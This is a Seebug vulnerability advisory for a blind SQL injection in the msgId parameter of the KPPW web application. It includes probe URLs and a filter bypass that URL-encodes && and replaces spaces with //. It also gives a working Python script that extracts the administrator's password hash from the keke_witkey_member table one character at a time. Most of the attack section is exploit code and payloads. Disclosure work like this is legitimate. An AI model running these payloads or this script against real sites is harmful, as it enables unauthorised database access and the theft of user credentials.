KPPW latest version: bypassing the filter and continuing the blind SQL injection

2015-03-31T00:00:00
ID SSV:94510
Type seebug
Reporter Root
Modified 2015-03-31T00:00:00

Description

Brief description:

KPPW2620150327UTF-8.zip (the latest release, dated March 27)

Details:

Url1 (normal request, `msgId=74`): http://localhost/KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1

![图片1.png](https://images.seebug.org/upload/201503/2723220621c436854a2914d1f1bdfdfb79bed2b3.png)

Url2 (`msgId=74&&1=1`, URL-encoded, true condition): http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1

![图片2.png](https://images.seebug.org/upload/201503/2723222698ece75cf6b1e20b8558e5b3daaefa8d.png)

Url3 (`msgId=74&&1=2`, URL-encoded, false condition): http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D2

![图片3.png](https://images.seebug.org/upload/201503/272322489410ffb629cb810421479dddd42b51fe.png)

Proof of vulnerability:

The responses to Url2 and Url3 differ, so the `msgId` parameter is injectable. Some filtering is in place, but it can be bypassed by sending `&&` URL-encoded and writing `//` wherever a space would go, for example:

`&&(select//CHAR(48))=SUBSTR((SELECT//password//from//keke_witkey_member//WHERE//uid=1),1,1)`

This condition asks whether the first character of the uid=1 member's password equals CHAR(48), i.e. `0`. The verification script below loops over the position and the candidate character code, using the string `msgId=73` in the response (present only when message 74 is actually returned) as the true/false signal.

```python
# coding:utf-8
import httplib


def get(i1, i2):
    """Ask the oracle whether character i2 of the uid=1 member's password
    equals CHAR(i1). Returns how many times the keyword appears in the
    response: non-zero means the injected condition was true."""
    page = ""
    rHtml = httplib.HTTPConnection("localhost", 80, False)
    # Payload: msgId=74&&(select//CHAR(i1))=SUBSTR((SELECT//password//from//keke_witkey_member//WHERE//uid=1),i2,1)
    # `&&` is sent as %26%26 and every space is written as `//` (%2f%2f) to get past the filter.
    url = ("/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74"
           "%26%26(select%2f%2fCHAR(" + i1 + "))%3dSUBSTR((SELECT%2f%2fpassword%2f%2ffrom"
           "%2f%2fkeke_witkey_member%2f%2fWHERE%2f%2fuid%3d1)%2c" + i2 + ",1%29")
    # print url
    rHtml.request("GET", url, headers={
        "User-Agent": "Firefox/22.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        # If the server honours this and compresses the body, the keyword count
        # below will always be 0; drop the header in that case.
        "Accept-Encoding": "gzip, deflate",
        "Cookie": "PHPSESSID=*",  # session: set your own
        "Connection": "keep-alive",
    })
    page = rHtml.getresponse(False)
    return page.read().count('msgId=73')  # keyword: choose your own


mm = []
for i in range(1, 33):             # password hash positions 1..32
    for ii in range(48, 123):      # candidate character codes '0'..'z'
        if get(str(ii), str(i)) != 0:
            mm.append(chr(ii))
            print "".join(mm)
            break
```

Result

![图片4.png](https://images.seebug.org/upload/201503/272325156ad62e1f592a32c84a7611cfd24d0cb3.png)